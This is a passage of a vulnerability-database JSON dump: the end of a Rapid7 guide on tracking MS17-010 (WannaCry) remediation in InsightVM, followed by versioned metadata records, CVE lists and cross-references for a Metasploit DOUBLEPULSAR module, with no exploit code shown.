To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. 
If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the vulnerabilities exploited by WannaCry and ensure that they are being remediated. If you have any questions, please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:bc62d177-a43a-4d62-b4f0-851708246874] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/16/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-16T17:51:28", "lastseen": "2017-05-16T18:48:52", "immutableFields": [], "cvss2": {}, "cvss3": {}}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "hash": "012add761b4c443d021311bbf43b7c822db15fb34e75b0740cea5b3005e90975", "type": "metasploit", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "published": "2019-09-30T19:18:41", "modified": "2020-02-03T17:16:16", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-09-30T18:12:04", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-09-30T18:12:04", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", 
"THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": 
["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-30T18:12:04", "rev": 2, "value": 6.8, "vector": "NONE"}}, "hash": "27fb556c26bbde8903e3bb8617729bdd9e9d34f7c5a6bdb43cdf1cbe49a8a9af", "hashmap": [{"hash": "ead92bdcd20cbc918e777e28c4a83623", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c25dabffe89097874a062017ca347cc8", "key": "modified"}, {"hash": "03b7f7b734bdffbd849759d24edab76d", "key": "published"}, {"hash": "79b03fa9178806f1694441cff96d84a3", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "2a4acb977d851155649ad6e4f1698975", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "immutableFields": [], "lastseen": "2020-09-30T18:12:04", "modified": "2020-02-03T17:16:16", "objectVersion": "1.5", "published": "2019-09-30T19:18:41", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", 
"https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1717}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-09-30T18:12:04"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-08-01T21:14:18", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SSV:92952", "SSV:92964"], 
"type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/FREEBSD/MISC/CITRIX_NETSCALER_SOAP_BOF", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", 
"1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-01T21:14:18", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "bc4baba7087cd44277e80965f65cf0b7", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "lastseen": "2020-08-01T21:14:18", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:16:16", "objectVersion": "1.4", "published": "2019-09-30T19:18:41", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1386}, "differentElements": ["published", "modified"], "edition": 69, "lastseen": 
"2020-08-01T21:14:18"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-08-11T12:59:43", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": 
["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-11T12:59:43", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "849cc2b78ad9d07232bb964042aa03b4", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "lastseen": "2020-08-11T12:59:43", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", 
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1388}, "differentElements": ["published", "modified"], "edition": 70, "lastseen": "2020-08-11T12:59:43"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-07-14T03:11:42", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": 